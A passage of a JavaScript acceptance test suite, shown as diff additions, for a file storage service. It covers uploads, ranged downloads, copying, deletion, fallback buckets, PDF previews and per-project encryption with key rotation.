+ `${metricPrefix}_egress` + ) + } + projectId = new ObjectId().toString() + otherProjectId = new ObjectId().toString() + }) + + it('should send a 200 for the status endpoint', async function () { + const response = await fetch(`${filestoreUrl}/status`) + expect(response.status).to.equal(200) + const body = await response.text() + expect(body).to.contain('filestore') + expect(body).to.contain('up') + }) + + describe('with a file on the server', function () { + let fileId, fileUrl, constantFileContent + + const localFileReadPath = + '/tmp/filestore_acceptance_tests_file_read.txt' + + beforeEach('upload file', async function () { + fileId = new ObjectId().toString() + fileUrl = `${filestoreUrl}/project/${projectId}/file/${fileId}` + constantFileContent = [ + 'hello world', + `line 2 goes here ${Math.random()}`, + 'there are 3 lines in all', + ].join('\n') + + await fsWriteFile(localFileReadPath, constantFileContent) + + const readStream = fs.createReadStream(localFileReadPath) + const res = await fetch(fileUrl, { method: 'POST', body: readStream }) + if (!res.ok) throw new Error(res.statusText) + }) + + beforeEach('retrieve previous ingress metric', async function () { + // The upload request can bump the ingress metric. + // The content hash validation might require a full download + // in case the ETag field of the upload response is not a md5 sum. + if (['s3', 's3SSEC', 'gcs'].includes(Settings.filestore.backend)) { + previousIngress = await TestHelper.getMetric( + filestoreUrl, + `${metricPrefix}_ingress` + ) + } + }) + + it('should return 404 for a non-existant id', async function () { + const url = fileUrl + '___this_is_clearly_wrong___' + const response = await fetch(url) + expect(response.status).to.equal(404) + }) + + it('should return the file size on a HEAD request', async function () { + const expectedLength = Buffer.byteLength(constantFileContent) + const res = await fetch(fileUrl, { method: 'HEAD' }) + expect(res.status).to.equal(200) + expect(res.headers.get('Content-Length')).to.equal( + expectedLength.toString() + ) + }) + + it('should be able get the file back', async function () { + const res = await fetch(fileUrl) + const body = await res.text() + expect(body).to.equal(constantFileContent) + }) + + it('should send a 200 for the health-check endpoint using the file', async function () { + Settings.health_check = { + project_id: projectId, + file_id: fileId, + } + const response = await fetch(`${filestoreUrl}/health_check`) + expect(response.status).to.equal(200) + const body = await response.text() + expect(body).to.equal('OK') + }) + + it('should not leak a socket', async function () { + const res = await fetch(fileUrl) + if (!res.ok) throw new Error(res.statusText) + await res.text() + await expectNoSockets() + }) + + it('should be able to get back the first 9 bytes of the file', async function () { + const res = await fetch(fileUrl, { headers: { Range: 'bytes=0-8' } }) + const body = await res.text() + expect(body).to.equal('hello wor') + }) + + it('should be able to get back bytes 4 through 10 of the file', async function () { + const res = await fetch(fileUrl, { headers: { Range: 'bytes=4-10' } }) + const body = await res.text() + expect(body).to.equal('o world') + }) + + it('should be able to delete the file', async function () { + const response = await fetch(fileUrl, { method: 'DELETE' }) + expect(response.status).to.equal(204) + const response2 = await fetch(fileUrl) + expect(response2.status).to.equal(404) + }) + + it('should be able to copy files', async function () { + const newProjectID = new ObjectId().toString() + const newFileId = new ObjectId().toString() + const newFileUrl = `${filestoreUrl}/project/${newProjectID}/file/${newFileId}` + let response = await fetch(newFileUrl, { + method: 'PUT', + body: JSON.stringify({ + source: { + project_id: projectId, + file_id: fileId, + }, + }), + headers: { + 'Content-Type': 'application/json', + }, + }) + expect(response.status).to.equal(200) + response = await fetch(fileUrl, { method: 'DELETE' }) + expect(response.status).to.equal(204) + response = await fetch(newFileUrl) + const body = await response.text() + expect(body).to.equal(constantFileContent) + }) + + it('should be able to overwrite the file', async function () { + const newContent = `here is some different content, ${Math.random()}` + const readStream = streamifier.createReadStream(newContent) + await fetch(fileUrl, { method: 'POST', body: readStream }) + + const response = await fetch(fileUrl) + const body = await response.text() + expect(body).to.equal(newContent) + }) + + describe('IfNoneMatch', function () { + if (backendSettings.backend === 'fs') { + it('should refuse to handle IfNoneMatch', async function () { + await expect( + app.persistor.sendStream( + Settings.filestore.stores.user_files, + `${projectId}/${fileId}`, + fs.createReadStream(localFileReadPath), + { ifNoneMatch: '*' } + ) + ).to.be.rejectedWith(NotImplementedError) + }) + } else { + it('should reject sendStream on the same key with IfNoneMatch', async function () { + await expect( + app.persistor.sendStream( + Settings.filestore.stores.user_files, + `${projectId}/${fileId}`, + fs.createReadStream(localFileReadPath), + { ifNoneMatch: '*' } + ) + ).to.be.rejectedWith(AlreadyWrittenError) + }) + it('should allow sendStream on a different key with IfNoneMatch', async function () { + await app.persistor.sendStream( + Settings.filestore.stores.user_files, + `${projectId}/${fileId}-other`, + fs.createReadStream(localFileReadPath), + { ifNoneMatch: '*' } + ) + }) + } + }) + + if (backendSettings.backend !== 'fs') { + it('should record an egress metric for the upload', async function () { + const metric = await TestHelper.getMetric( + filestoreUrl, + `${metricPrefix}_egress` + ) + expect(metric - previousEgress).to.equal( + constantFileContent.length + dataEncryptionKeySize + ) + }) + + it('should record an ingress metric when downloading the file', async function () { + const response = await fetch(fileUrl) + expect(response.ok).to.be.true + await response.text() + const metric = await TestHelper.getMetric( + filestoreUrl, + `${metricPrefix}_ingress` + ) + expect(metric - previousIngress).to.equal( + constantFileContent.length + dataEncryptionKeySize + ) + }) + + it('should record an ingress metric for a partial download', async function () { + const response = await fetch(fileUrl, { + headers: { Range: 'bytes=0-8' }, + }) + expect(response.ok).to.be.true + await response.text() + const metric = await TestHelper.getMetric( + filestoreUrl, + `${metricPrefix}_ingress` + ) + expect(metric - previousIngress).to.equal(9 + dataEncryptionKeySize) + }) + } + }) + + describe('with multiple files', function () { + let fileIds, fileUrls, otherFileUrls, projectUrl, otherProjectUrl + const localFileReadPaths = [ + '/tmp/filestore_acceptance_tests_file_read_1.txt', + '/tmp/filestore_acceptance_tests_file_read_2.txt', + '/tmp/filestore_acceptance_tests_file_read_3.txt', + ] + const constantFileContents = [ + [ + 'hello world', + `line 2 goes here ${Math.random()}`, + 'there are 3 lines in all', + ].join('\n'), + [ + `for reference: ${Math.random()}`, + 'cats are the best animals', + 'wombats are a close second', + ].join('\n'), + [ + `another file: ${Math.random()}`, + 'with multiple lines', + 'the end', + ].join('\n'), + ] + + before('create local files', async function () { + return await Promise.all([ + fsWriteFile(localFileReadPaths[0], constantFileContents[0]), + fsWriteFile(localFileReadPaths[1], constantFileContents[1]), + fsWriteFile(localFileReadPaths[2], constantFileContents[2]), + ]) + }) + + beforeEach('upload two files', async function () { + projectUrl = `${filestoreUrl}/project/${projectId}` + otherProjectUrl = `${filestoreUrl}/project/${otherProjectId}` + fileIds = [ + new ObjectId().toString(), + new ObjectId().toString(), + new ObjectId().toString(), + ] + fileUrls = [ + `${projectUrl}/file/${fileIds[0]}`, + `${projectUrl}/file/${fileIds[1]}`, + ] + otherFileUrls = [`${otherProjectUrl}/file/${fileIds[2]}`] + + await Promise.all([ + fetch(fileUrls[0], { + method: 'POST', + body: fs.createReadStream(localFileReadPaths[0]), + }), + fetch(fileUrls[1], { + method: 'POST', + body: fs.createReadStream(localFileReadPaths[1]), + }), + fetch(otherFileUrls[0], { + method: 'POST', + body: fs.createReadStream(localFileReadPaths[2]), + }), + ]) + }) + + it('should get the directory size', async function () { + const response = await fetch( + `${filestoreUrl}/project/${projectId}/size` + ) + const body = await response.text() + expect(parseInt(JSON.parse(body)['total bytes'])).to.equal( + constantFileContents[0].length + constantFileContents[1].length + ) + }) + + it('should store the files', async function () { + for (const index in fileUrls) { + const response = await fetch(fileUrls[index]) + const body = await response.text() + expect(body).to.equal(constantFileContents[index]) + } + }) + + it('should be able to delete the project', async function () { + let response = await fetch(projectUrl, { method: 'DELETE' }) + expect(response.status).to.equal(204) + + for (const index in fileUrls) { + response = await fetch(fileUrls[index]) + expect(response.status).to.equal(404) + } + }) + + it('should not delete files in other projects', async function () { + for (const index in otherFileUrls) { + const response = await fetch(otherFileUrls[index]) + expect(response.status).to.equal(200) + } + }) + + it('should not delete a partial project id', async function () { + const response = await fetch(`${filestoreUrl}/project/5`, { + method: 'DELETE', + }) + expect(response.status).to.equal(400) + }) + }) + + describe('with a large file', function () { + this.timeout(1000 * 20) + let fileId, fileUrl, largeFileContent, error + + beforeEach('upload large file', async function () { + fileId = new ObjectId().toString() + fileUrl = `${filestoreUrl}/project/${projectId}/file/${fileId}` + + largeFileContent = '_wombat_'.repeat(1024 * 1024) // 8 megabytes + largeFileContent += Math.random() + + const readStream = streamifier.createReadStream(largeFileContent) + const res = await fetch(fileUrl, { method: 'POST', body: readStream }) + if (!res.ok) throw new Error(res.statusText) + }) + + it('should be able to get the file back', async function () { + const response = await fetch(fileUrl) + const body = await response.text() + expect(body).to.equal(largeFileContent) + }) + + it('should not throw an error', function () { + expect(error).not.to.exist + }) + + it('should not leak a socket', async function () { + const response = await fetch(fileUrl) + await response.text() + await expectNoSockets() + }) + + it('should not leak a socket if the connection is aborted', async function () { + const controller = new AbortController() + const response = await fetch(fileUrl, { signal: controller.signal }) + expect(response.ok).to.be.true + controller.abort() + await expectNoSockets() + }) + }) + + if ( + (backendSettings.backend === 's3' && !backendSettings.fallback) || + (backendSettings.backend === 'gcs' && + backendSettings.fallback?.backend === 's3') + ) { + describe('with a file in a specific bucket', function () { + let constantFileContent, fileId, fileUrl, bucketName + + beforeEach('upload file into random bucket', async function () { + constantFileContent = `This is a file in a different S3 bucket ${Math.random()}` + fileId = new ObjectId().toString() + bucketName = `random-bucket-${new ObjectId().toString()}` + fileUrl = `${filestoreUrl}/bucket/${bucketName}/key/${fileId}` + + const s3 = new S3Persistor({ + ...s3Config(), + key: process.env.MINIO_ROOT_USER, + secret: process.env.MINIO_ROOT_PASSWORD, + })._getClientForBucket(bucketName) + await s3 + .createBucket({ + Bucket: bucketName, + }) + .promise() + await s3 + .upload({ + Bucket: bucketName, + Key: fileId, + Body: constantFileContent, + }) + .promise() + }) + + it('should get the file from the specified bucket', async function () { + const response = await fetch(fileUrl) + const body = await response.text() + expect(body).to.equal(constantFileContent) + }) + }) + } + + if (backendSettings.backend === 'gcs') { + describe('when deleting a file in GCS', function () { + let fileId, fileUrl, content, error, dateBefore, dateAfter + + beforeEach('upload and delete file', async function () { + fileId = new ObjectId() + fileUrl = `${filestoreUrl}/project/${projectId}/file/${fileId}` + + content = '_wombat_' + Math.random() + + const readStream = streamifier.createReadStream(content) + let res = await fetch(fileUrl, { method: 'POST', body: readStream }) + if (!res.ok) throw new Error(res.statusText) + dateBefore = new Date() + res = await fetch(fileUrl, { method: 'DELETE' }) + dateAfter = new Date() + if (!res.ok) throw new Error(res.statusText) + }) + + it('should not throw an error', function () { + expect(error).not.to.exist + }) + + it('should copy the file to the deleted-files bucket', async function () { + let date = dateBefore + const keys = [] + while (date <= dateAfter) { + keys.push(`${projectId}/${fileId}-${date.toISOString()}`) + date = new Date(date.getTime() + 1) + } + await TestHelper.expectPersistorToHaveSomeFile( + app.persistor, + `${Settings.filestore.stores.user_files}-deleted`, + keys, + content + ) + }) + + it('should remove the file from the original bucket', async function () { + await TestHelper.expectPersistorNotToHaveFile( + app.persistor, + Settings.filestore.stores.user_files, + `${projectId}/${fileId}` + ) + }) + }) + } + + if (backendSettings.fallback) { + describe('with a fallback', function () { + let constantFileContent, + fileId, + fileKey, + fileUrl, + bucket, + fallbackBucket + + beforeEach('prepare fallback', function () { + constantFileContent = `This is yet more file content ${Math.random()}` + fileId = new ObjectId().toString() + fileKey = `${projectId}/${fileId}` + fileUrl = `${filestoreUrl}/project/${projectId}/file/${fileId}` + + bucket = Settings.filestore.stores.user_files + fallbackBucket = Settings.filestore.fallback.buckets[bucket] + }) + + describe('with a file in the fallback bucket', function () { + beforeEach('upload into fallback', async function () { + await TestHelper.uploadStringToPersistor( + app.persistor.fallbackPersistor, + fallbackBucket, + fileKey, + constantFileContent + ) + }) + + it('should not find file in the primary', async function () { + await TestHelper.expectPersistorNotToHaveFile( + app.persistor.primaryPersistor, + bucket, + fileKey + ) + }) + + it('should find the file in the fallback', async function () { + await TestHelper.expectPersistorToHaveFile( + app.persistor.fallbackPersistor, + fallbackBucket, + fileKey, + constantFileContent + ) + }) + + describe('when copyOnMiss is disabled', function () { + beforeEach('swap copyOnMiss=false', function () { + app.persistor.settings.copyOnMiss = false + }) + + it('should fetch the file', async function () { + const res = await fetch(fileUrl) + const body = await res.text() + expect(body).to.equal(constantFileContent) + }) + + it('should not copy the file to the primary', async function () { + const response = await fetch(fileUrl) + expect(response.ok).to.be.true + await response.text() + + await TestHelper.expectPersistorNotToHaveFile( + app.persistor.primaryPersistor, + bucket, + fileKey + ) + }) + }) + + describe('when copyOnMiss is enabled', function () { + beforeEach('swap copyOnMiss=true', function () { + app.persistor.settings.copyOnMiss = true + }) + + it('should fetch the file', async function () { + const res = await fetch(fileUrl) + const body = await res.text() + expect(body).to.equal(constantFileContent) + }) + + it('copies the file to the primary', async function () { + const response = await fetch(fileUrl) + expect(response.ok).to.be.true + await response.text() + // wait for the file to copy in the background + await msleep(1000) + + await TestHelper.expectPersistorToHaveFile( + app.persistor.primaryPersistor, + bucket, + fileKey, + constantFileContent + ) + }) + }) + + describe('when copying a file', function () { + let newFileId, newFileUrl, newFileKey, opts + + beforeEach('prepare to copy file', function () { + const newProjectID = new ObjectId().toString() + newFileId = new ObjectId().toString() + newFileUrl = `${filestoreUrl}/project/${newProjectID}/file/${newFileId}` + newFileKey = `${newProjectID}/${newFileId}` + + opts = { + method: 'put', + body: JSON.stringify({ + source: { + project_id: projectId, + file_id: fileId, + }, + }), + headers: { + 'Content-Type': 'application/json', + }, + } + }) + + describe('when copyOnMiss is false', function () { + beforeEach('copy with copyOnMiss=false', async function () { + app.persistor.settings.copyOnMiss = false + + const response = await fetch(newFileUrl, opts) + expect(response.status).to.equal(200) + }) + + it('should leave the old file in the old bucket', async function () { + await TestHelper.expectPersistorToHaveFile( + app.persistor.fallbackPersistor, + fallbackBucket, + fileKey, + constantFileContent + ) + }) + + it('should not create a new file in the old bucket', async function () { + await TestHelper.expectPersistorNotToHaveFile( + app.persistor.fallbackPersistor, + fallbackBucket, + newFileKey + ) + }) + + it('should create a new file in the new bucket', async function () { + await TestHelper.expectPersistorToHaveFile( + app.persistor.primaryPersistor, + bucket, + newFileKey, + constantFileContent + ) + }) + + it('should not copy the old file to the primary with the old key', async function () { + // wait for the file to copy in the background + await msleep(1000) + + await TestHelper.expectPersistorNotToHaveFile( + app.persistor.primaryPersistor, + bucket, + fileKey + ) + }) + }) + + describe('when copyOnMiss is true', function () { + beforeEach('copy with copyOnMiss=false', async function () { + app.persistor.settings.copyOnMiss = true + + const response = await fetch(newFileUrl, opts) + expect(response.status).to.equal(200) + }) + + it('should leave the old file in the old bucket', async function () { + await TestHelper.expectPersistorToHaveFile( + app.persistor.fallbackPersistor, + fallbackBucket, + fileKey, + constantFileContent + ) + }) + + it('should not create a new file in the old bucket', async function () { + await TestHelper.expectPersistorNotToHaveFile( + app.persistor.fallbackPersistor, + fallbackBucket, + newFileKey + ) + }) + + it('should create a new file in the new bucket', async function () { + await TestHelper.expectPersistorToHaveFile( + app.persistor.primaryPersistor, + bucket, + newFileKey, + constantFileContent + ) + }) + + it('should copy the old file to the primary with the old key', async function () { + // wait for the file to copy in the background + await msleep(1000) + + await TestHelper.expectPersistorToHaveFile( + app.persistor.primaryPersistor, + bucket, + fileKey, + constantFileContent + ) + }) + }) + }) + }) + + describe('when sending a file', function () { + beforeEach('upload file', async function () { + const readStream = + streamifier.createReadStream(constantFileContent) + const res = await fetch(fileUrl, { + method: 'POST', + body: readStream, + }) + if (!res.ok) throw new Error(res.statusText) + }) + + it('should store the file on the primary', async function () { + await TestHelper.expectPersistorToHaveFile( + app.persistor.primaryPersistor, + bucket, + fileKey, + constantFileContent + ) + }) + + it('should not store the file on the fallback', async function () { + await TestHelper.expectPersistorNotToHaveFile( + app.persistor.fallbackPersistor, + fallbackBucket, + `${projectId}/${fileId}` + ) + }) + }) + + describe('when deleting a file', function () { + describe('when the file exists on the primary', function () { + beforeEach('upload into primary', async function () { + await TestHelper.uploadStringToPersistor( + app.persistor.primaryPersistor, + bucket, + fileKey, + constantFileContent + ) + }) + + it('should delete the file', async function () { + const response1 = await fetch(fileUrl, { method: 'DELETE' }) + expect(response1.status).to.equal(204) + const response2 = await fetch(fileUrl) + expect(response2.status).to.equal(404) + }) + }) + + describe('when the file exists on the fallback', function () { + beforeEach('upload into fallback', async function () { + await TestHelper.uploadStringToPersistor( + app.persistor.fallbackPersistor, + fallbackBucket, + fileKey, + constantFileContent + ) + }) + + it('should delete the file', async function () { + const response1 = await fetch(fileUrl, { method: 'DELETE' }) + expect(response1.status).to.equal(204) + const response2 = await fetch(fileUrl) + expect(response2.status).to.equal(404) + }) + }) + + describe('when the file exists on both the primary and the fallback', function () { + beforeEach( + 'upload into both primary and fallback', + async function () { + await TestHelper.uploadStringToPersistor( + app.persistor.primaryPersistor, + bucket, + fileKey, + constantFileContent + ) + await TestHelper.uploadStringToPersistor( + app.persistor.fallbackPersistor, + fallbackBucket, + fileKey, + constantFileContent + ) + } + ) + + it('should delete the files', async function () { + const response1 = await fetch(fileUrl, { method: 'DELETE' }) + expect(response1.status).to.equal(204) + const response2 = await fetch(fileUrl) + expect(response2.status).to.equal(404) + }) + }) + + describe('when the file does not exist', function () { + it('should return return 204', async function () { + // S3 doesn't give us a 404 when the object doesn't exist, so to stay + // consistent we merrily return 204 ourselves here as well + const response = await fetch(fileUrl, { method: 'DELETE' }) + expect(response.status).to.equal(204) + }) + }) + }) + }) + } + + describe('with a pdf file', function () { + let fileId, fileUrl, localFileSize + const localFileReadPath = Path.resolve( + __dirname, + '../../fixtures/test.pdf' + ) + + beforeEach('upload test.pdf', async function () { + fileId = new ObjectId().toString() + fileUrl = `${filestoreUrl}/project/${projectId}/file/${fileId}` + const stat = await fsStat(localFileReadPath) + localFileSize = stat.size + const readStream = fs.createReadStream(localFileReadPath) + const res = await fetch(fileUrl, { method: 'POST', body: readStream }) + if (!res.ok) throw new Error(res.statusText) + }) + + it('should be able get the file back', async function () { + const response = await fetch(fileUrl) + const body = await response.text() + expect(body.substring(0, 8)).to.equal('%PDF-1.5') + }) + + if (backendSettings.backend !== 'fs') { + it('should record an egress metric for the upload', async function () { + const metric = await TestHelper.getMetric( + filestoreUrl, + `${metricPrefix}_egress` + ) + expect(metric - previousEgress).to.equal( + localFileSize + dataEncryptionKeySize + ) + }) + } + + describe('getting the preview image', function () { + this.timeout(1000 * 20) + let previewFileUrl + + beforeEach('prepare previewFileUrl for preview', function () { + previewFileUrl = `${fileUrl}?style=preview` + }) + + it('should not time out', async function () { + const response = await fetch(previewFileUrl) + expect(response.status).to.equal(200) + await response.arrayBuffer() + }) + + it('should respond with image data', async function () { + // note: this test relies of the imagemagick conversion working + const response = await fetch(previewFileUrl) + expect(response.status).to.equal(200) + const body = await response.text() + expect(body.length).to.be.greaterThan(400) + expect(body.substr(1, 3)).to.equal('PNG') + }) + }) + + describe('warming the cache', function () { + this.timeout(1000 * 20) + let previewFileUrl + + beforeEach('prepare previewFileUrl for cacheWarn', function () { + previewFileUrl = `${fileUrl}?style=preview&cacheWarm=true` + }) + + it('should not time out', async function () { + const response = await fetch(previewFileUrl) + expect(response.status).to.equal(200) + await response.arrayBuffer() + }) + + it('should not leak sockets', async function () { + const response1 = await fetch(previewFileUrl) + expect(response1.status).to.equal(200) + // do not read the response body, should be destroyed immediately + const response2 = await fetch(previewFileUrl) + expect(response2.status).to.equal(200) + // do not read the response body, should be destroyed immediately + await expectNoSockets() + }) + + it("should respond with only an 'OK'", async function () { + // note: this test relies of the imagemagick conversion working + const response = await fetch(previewFileUrl) + const body = await response.text() + expect(body).to.equal('OK') + }) + }) + }) + + describe('with server side encryption', function () { + if (backendSettings.backend !== 's3SSEC') return + + before('sanity check top-level variable', function () { + expect(dataEncryptionKeySize).to.equal(32) + }) + + let fileId1, + fileId2, + fileKey1, + fileKey2, + fileKeyOtherProject, + fileUrl1, + fileUrl2 + beforeEach('prepare ids', function () { + fileId1 = new ObjectId().toString() + fileId2 = new ObjectId().toString() + fileKey1 = `${projectId}/${fileId1}` + fileKey2 = `${projectId}/${fileId2}` + fileKeyOtherProject = `${new ObjectId().toString()}/${new ObjectId().toString()}` + fileUrl1 = `${filestoreUrl}/project/${projectId}/file/${fileId1}` + fileUrl2 = `${filestoreUrl}/project/${projectId}/file/${fileId2}` + }) + + beforeEach('ensure DEK is missing', async function () { + // Cannot use test helper expectPersistorNotToHaveFile here, we need to use the KEK. + await expect( + app.persistor.getDataEncryptionKeySize( + backendSettings.stores.user_files, + fileKey1 + ) + ).to.rejectedWith(NotFoundError) + }) + + async function createRandomContent(url, suffix = '') { + const content = Math.random().toString() + suffix + const res = await fetch(url, { + method: 'POST', + body: Stream.Readable.from([content]), + }) + if (!res.ok) throw new Error(res.statusText) + return async () => { + const res = await fetch(url, { method: 'GET' }) + if (!res.ok) throw new Error(res.statusText) + expect(await res.text()).to.equal(content) + } + } + + it('should create a DEK when asked explicitly', async function () { + await app.persistor.generateDataEncryptionKey( + backendSettings.stores.user_files, + fileKey1 + ) + expect( + await app.persistor.getDataEncryptionKeySize( + backendSettings.stores.user_files, + fileKey1 + ) + ).to.equal(32) + }) + + it('should create a DEK from writes', async function () { + await createRandomContent(fileUrl1) + expect( + await app.persistor.getDataEncryptionKeySize( + backendSettings.stores.user_files, + fileKey1 + ) + ).to.equal(32) + }) + + it('should not create a DEK from reads', async function () { + const res = await fetch(fileUrl1, { + method: 'GET', + }) + if (res.status !== 404) throw new Error(`${res.status} should be 404`) + + // Cannot use test helper expectPersistorNotToHaveFile here, we need to use the KEK. + await expect( + app.persistor.getDataEncryptionKeySize( + backendSettings.stores.user_files, + fileKey1 + ) + ).to.rejectedWith(NotFoundError) + }) + + it('should never overwrite a data encryption key', async function () { + const checkGET = await createRandomContent(fileUrl1) + + await expect( + app.persistor.generateDataEncryptionKey( + backendSettings.stores.user_files, + fileKey1 + ) + ).to.rejectedWith(AlreadyWrittenError) + + await checkGET() + }) + + it('should re-use the data encryption key after a write', async function () { + const checkGET1 = await createRandomContent(fileUrl1, '1') + const checkGET2 = await createRandomContent(fileUrl2, '2') + await checkGET1() + await checkGET2() + }) + + describe('kek rotation', function () { + const newKEK = new RootKeyEncryptionKey( + crypto.generateKeySync('aes', { length: 256 }).export(), + Buffer.alloc(32) + ) + const oldKEK = new RootKeyEncryptionKey( + crypto.generateKeySync('aes', { length: 256 }).export(), + Buffer.alloc(32) + ) + const migrationStep0 = new PerProjectEncryptedS3Persistor({ + ...s3SSECConfig(), + automaticallyRotateDEKEncryption: false, + async getRootKeyEncryptionKeys() { + return [oldKEK] // only old key + }, + }) + const migrationStep1 = new PerProjectEncryptedS3Persistor({ + ...s3SSECConfig(), + automaticallyRotateDEKEncryption: false, + async getRootKeyEncryptionKeys() { + return [oldKEK, newKEK] // new key as fallback + }, + }) + const migrationStep2 = new PerProjectEncryptedS3Persistor({ + ...s3SSECConfig(), + automaticallyRotateDEKEncryption: true, // <- different compared to partiallyRotated + async getRootKeyEncryptionKeys() { + return [newKEK, oldKEK] // old keys as fallback + }, + }) + const migrationStep3 = new PerProjectEncryptedS3Persistor({ + ...s3SSECConfig(), + automaticallyRotateDEKEncryption: true, + async getRootKeyEncryptionKeys() { + return [newKEK] // only new key + }, + }) + + async function checkWrites( + fileKey, + writer, + readersSuccess, + readersFailed + ) { + const content = Math.random().toString() + await writer.sendStream( + Settings.filestore.stores.user_files, + fileKey, + Stream.Readable.from([content]) + ) + + for (const persistor of readersSuccess) { + await TestHelper.expectPersistorToHaveFile( + persistor, + backendSettings.stores.user_files, + fileKey, + content + ) + } + + for (const persistor of readersFailed) { + await expect( + TestHelper.expectPersistorToHaveFile( + persistor, + backendSettings.stores.user_files, + fileKey, + content + ) + ).to.be.rejectedWith(NoKEKMatchedError) + } + } + + const stages = [ + { + name: 'stage 0 - [old]', + prev: migrationStep0, + cur: migrationStep0, + fail: [migrationStep3], + }, + { + name: 'stage 1 - [old,new]', + prev: migrationStep0, + cur: migrationStep1, + fail: [], + }, + { + name: 'stage 2 - [new,old]', + prev: migrationStep1, + cur: migrationStep2, + fail: [], + }, + { + name: 'stage 3 - [new]', + prev: migrationStep2, + cur: migrationStep3, + fail: [migrationStep0], + }, + ] + + for (const { name, prev, cur, fail } of stages) { + describe(name, function () { + this.timeout(1000 * 30) + + it('can read old writes', async function () { + await checkWrites(fileKey1, prev, [prev, cur], fail) + await checkWrites(fileKey2, prev, [prev, cur], fail) // check again after access + await checkWrites(fileKeyOtherProject, prev, [prev, cur], fail) + }) + it('can read new writes', async function () { + await checkWrites(fileKey1, prev, [prev, cur], fail) + await checkWrites(fileKey2, cur, [prev, cur], fail) // check again after access + await checkWrites(fileKeyOtherProject, cur, [prev, cur], fail) + }) + }) + } + + describe('full migration', function () { + it('can read old writes if rotated in sequence', async function () { + await checkWrites( + fileKey1, + migrationStep0, + [ + migrationStep0, + migrationStep1, + migrationStep2, // migrates + migrationStep3, + ], + [] + ) + }) + it('cannot read/write if not rotated', async function () { + await checkWrites( + fileKey1, + migrationStep0, + [migrationStep0], + [migrationStep3] + ) + }) + }) + }) + + /** @type {import('aws-sdk/clients/s3')} */ + let s3Client + before('create s3 client', function () { + s3Client = new S3Persistor(s3Config())._getClientForBucket('') + }) + + async function checkDEKStorage({ + dekBucketKeys = [], + userFilesBucketKeys = [], + }) { + await createRandomContent(fileUrl1) + + const { Contents: dekEntries } = await s3Client + .listObjectsV2({ + Bucket: process.env.AWS_S3_USER_FILES_DEK_BUCKET_NAME, + Prefix: `${projectId}/`, + }) + .promise() + expect(dekEntries).to.have.length(dekBucketKeys.length) + // Order is not predictable, use members + expect(dekEntries.map(o => o.Key)).to.have.members(dekBucketKeys) + + const { Contents: userFilesEntries } = await s3Client + .listObjectsV2({ + Bucket: backendSettings.stores.user_files, + Prefix: `${projectId}/`, + }) + .promise() + expect(userFilesEntries).to.have.length(userFilesBucketKeys.length) + // Order is not predictable, use members + expect(userFilesEntries.map(o => o.Key)).to.have.members( + userFilesBucketKeys + ) + } + + it('should use a custom bucket for DEKs', async function () { + await checkDEKStorage({ + dekBucketKeys: [`${projectId}/dek`], + userFilesBucketKeys: [fileKey1], + }) + }) + + describe('deleteDirectory', function () { + let checkGET1, checkGET2 + beforeEach('create files', async function () { + checkGET1 = await createRandomContent(fileUrl1, '1') + checkGET2 = await createRandomContent(fileUrl2, '2') + }) + it('should refuse to delete top-level prefix', async function () { + await expect( + app.persistor.deleteDirectory( + Settings.filestore.stores.user_files, + projectId.slice(0, 3) + ) + ).to.be.rejectedWith('not a project-folder') + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + fileKey1 + ) + ).to.equal(true) + await checkGET1() + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + fileKey2 + ) + ).to.equal(true) + expect( + await app.persistor.getDataEncryptionKeySize( + Settings.filestore.stores.user_files, + fileKey2 + ) + ).to.equal(32) + await checkGET2() + }) + it('should delete sub-folder and keep DEK', async function () { + await app.persistor.deleteDirectory( + Settings.filestore.stores.user_files, + fileKey1 // not really a sub-folder, but it will do for this test. + ) + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + fileKey1 + ) + ).to.equal(false) + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + fileKey2 + ) + ).to.equal(true) + expect( + await app.persistor.getDataEncryptionKeySize( + Settings.filestore.stores.user_files, + fileKey2 + ) + ).to.equal(32) + await checkGET2() + }) + it('should delete project folder and DEK', async function () { + await app.persistor.deleteDirectory( + Settings.filestore.stores.user_files, + `${projectId}/` + ) + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + fileKey1 + ) + ).to.equal(false) + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + fileKey2 + ) + ).to.equal(false) + await expect( + app.persistor.getDataEncryptionKeySize( + Settings.filestore.stores.user_files, + fileKey2 + ) + ).to.rejectedWith(NotFoundError) + }) + }) + }) + + describe('getObjectSize', function () { + it('should return a number', async function () { + const buf = Buffer.from('hello') + const fileId = new ObjectId().toString() + const fileUrl = `${filestoreUrl}/project/${projectId}/file/${fileId}` + const res = await fetch(fileUrl, { + method: 'POST', + body: Stream.Readable.from([buf]), + }) + if (!res.ok) throw new Error(res.statusText) + expect( + await app.persistor.getObjectSize( + Settings.filestore.stores.user_files, + `${projectId}/${fileId}` + ) + ).to.equal(buf.byteLength) + }) + }) + + describe('checkIfObjectExists', function () { + it('should return false when the object does not exist', async function () { + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + `${projectId}/${new ObjectId().toString()}` + ) + ).to.equal(false) + }) + it('should return true when the object exists', async function () { + const fileId = new ObjectId().toString() + const fileUrl = `${filestoreUrl}/project/${projectId}/file/${fileId}` + const res = await fetch(fileUrl, { + method: 'POST', + body: Stream.Readable.from(['hello']), + }) + if (!res.ok) throw new Error(res.statusText) + expect( + await app.persistor.checkIfObjectExists( + Settings.filestore.stores.user_files, + `${projectId}/${fileId}` + ) + ).to.equal(true) + }) + }) + + if (backendSettings.backend === 's3SSEC') { + describe('storageClass', function () { + it('should use the default storage class for dek', async function () { + const key = `${projectId}/${new ObjectId()}` + const dekBucket = process.env.AWS_S3_USER_FILES_DEK_BUCKET_NAME + await app.persistor.sendStream( + dekBucket, + key, + Stream.Readable.from(['hello']) + ) + expect( + await app.persistor.getObjectStorageClass(dekBucket, key) + ).to.equal(undefined) + }) + + it('should use the custom storage class for user files', async function () { + const key = `${projectId}/${new ObjectId()}` + await app.persistor.sendStream( + Settings.filestore.stores.user_files, + key, + Stream.Readable.from(['hello']) + ) + const sc = AWS_S3_USER_FILES_STORAGE_CLASS + expect(sc).to.exist + expect( + await app.persistor.getObjectStorageClass( + Settings.filestore.stores.user_files, + key + ) + ).to.equal(sc) + }) + }) + } + + describe('autoGunzip', function () { + let key + beforeEach('new key', function () { + key = `${projectId}/${new ObjectId().toString()}` + }) + this.timeout(60 * 1000) + const body = 